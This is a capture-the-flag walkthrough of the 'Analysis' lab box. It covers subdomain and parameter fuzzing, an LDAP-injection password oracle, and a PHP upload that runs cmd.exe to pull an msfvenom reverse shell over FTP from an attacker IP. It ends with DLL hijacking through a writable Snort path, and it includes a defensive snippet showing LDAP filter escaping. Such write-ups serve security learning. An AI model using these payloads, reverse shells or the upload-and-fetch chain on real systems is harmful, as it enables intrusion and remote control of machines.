User flag
Analysis.htb
I started by enumerating the virtual hosts (VHosts) on the web server, since there was no obvious vulnerability on the website itself:
```bash
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://analysis.htb/ -H "Host: FUZZ.analysis.htb"
```
The only result should be internal.analysis.htb, so let's fuzz that host further:
```bash
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://internal.analysis.htb/FUZZ
```
After extensive fuzzing, I discovered an interesting PHP file:
```bash
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://internal.analysis.htb/users/FUZZ.php
```
Now we have a file named list.php that requires a parameter. To find its name, we once again use ffuf, this time to brute-force parameter names (the `-fs 17` filter hides the default-size response):
```bash
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt -u http://internal.analysis.htb/users/list.php?FUZZ=dong -fs 17
```
The parameter we were looking for is called name and seems to be part of an LDAP query; passing * returns everything.
After some research and reading about LDAP injection on HackTricks, I used ffuf to brute-force the user's password one character at a time, using the response size as the oracle:
```bash
# start with this and look for valid characters: a response size of 418 means a match
ffuf -w /usr/share/wordlists/seclists/Fuzzing/alphanum-case-extra.txt -u 'http://internal.analysis.htb/users/list.php?name=*)(%26(objectClass=user)(description=FUZZ*)' -fs 406
# prepend each confirmed character to FUZZ and repeat until you have the full password
ffuf -w /usr/share/wordlists/seclists/Fuzzing/alphanum-case-extra.txt -u 'http://internal.analysis.htb/users/list.php?name=*)(%26(objectClass=user)(description=9FUZZ*)' -fs 406
ffuf -w /usr/share/wordlists/seclists/Fuzzing/alphanum-case-extra.txt -u 'http://internal.analysis.htb/users/list.php?name=*)(%26(objectClass=user)(description=97FUZZ*)' -fs 406
```
🔍 Hint: The password contains a '*'; insert it when no other character produces a response of size 418.
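The injection above works because list.php appears to concatenate the name parameter straight into the LDAP filter, so the closing parenthesis and the `(&(objectClass=user)(description=9*)` clause become part of the query. The following is an added example (not code from the box or this writeup) showing the fix on the application side: escaping the value per RFC 4515 before it enters the filter. The filter shape `(&(objectClass=user)(name=...))` is an assumption about what the PHP does.

```python
import re

# RFC 4515 section 3: the only characters with special meaning inside a
# filter assertion value. Each becomes a backslash plus two hex digits.
_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}


def escape_ldap_filter_value(value: str) -> str:
    """Escape one user-supplied value so it can only ever be matched literally."""
    return "".join(_ESCAPES.get(ch, ch) for ch in value)


def build_filter_vulnerable(name: str) -> str:
    """Raw concatenation: the pattern list.php on the box appears to use (assumed)."""
    return f"(&(objectClass=user)(name={name}))"


def build_filter_safe(name: str) -> str:
    """Same query with the value escaped; the filter structure can no longer change."""
    return f"(&(objectClass=user)(name={escape_ldap_filter_value(name)}))"


# Naive matcher for "(attribute=value)" assertions; good enough to show which
# attributes a filter actually asks the directory about.
_ASSERTION = re.compile(r"\(([A-Za-z][\w-]*)=([^()]*)\)")


def assertions(ldap_filter: str) -> list[tuple[str, str]]:
    """Return the (attribute, value) assertions present in a filter string."""
    return _ASSERTION.findall(ldap_filter)


# Constructed sample: the prefix-probe payload from the writeup, URL-decoded.
# (description=9*) is true only for entries whose description starts with "9",
# so a differing response size leaks one character of the stored value per probe.
PAYLOAD = "*)(&(objectClass=user)(description=9*)"

if __name__ == "__main__":
    # Vulnerable: the attacker-controlled description clause reaches the directory.
    print(build_filter_vulnerable(PAYLOAD))
    print([attr for attr, _ in assertions(build_filter_vulnerable(PAYLOAD))])
    # Safe: the whole payload is a literal name value; only objectClass and name are queried.
    print(build_filter_safe(PAYLOAD))
    print([attr for attr, _ in assertions(build_filter_safe(PAYLOAD))])
```

PHP offers the same escaping natively via `ldap_escape($value, '', LDAP_ESCAPE_FILTER)`; the oracle disappears because no input can add a `description` assertion to the query.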
Earlier we found a route called /employees; maybe there is some sort of login there.
```bash
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-files.txt -u http://internal.analysis.htb/employees/FUZZ.php
```
Indeed there is a login.php where we can log in with the gathered credentials, after which we are presented with a shady file upload.
I generated an msfvenom reverse shell and a PHP file that fetches it onto the machine via cmd.exe over FTP and runs it.
```bash
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.88 LPORT=4711 -f exe -o /usr/share/tools/tmp/71973864.exe
```
```php
<?php system('cmd.exe /c "@echo open 10.10.14.88 21>gztxpuci.txt&@echo binary>>gztxpuci.txt&@echo GET tmp/71973864.exe >>gztxpuci.txt&@echo quit>>gztxpuci.txt&@ftp -A -s:gztxpuci.txt -v -i&del gztxpuci.txt&71973864.exe"'); ?>
```
🔍 Hint: The msfvenom command and the shell were generated with my PentestServerSuite, which made this process really easy.
The only thing left to do is to find the uploads folder. For this I once again used ffuf:
```bash
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://internal.analysis.htb/dashboard/FUZZ
```
It found the uploads folder, and of course my PHP file was in it. Requesting the PHP file popped the shell.
Root flag
The first thing I did was run winPEAS, which found something in Snort where we could place a malicious DLL file.
Reading through the Snort config files, we find a DLL that Snort loads from a writable location.
```bash
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.88 LPORT=4713 -f dll -o /usr/share/tools/tmp/14904932.dll
# upload it to -> C:\Snort\lib\snort_dynamicpreprocessor\sf_engine.dll
```
The box was not too hard and entertained me quite well, although the root part was a bit easy.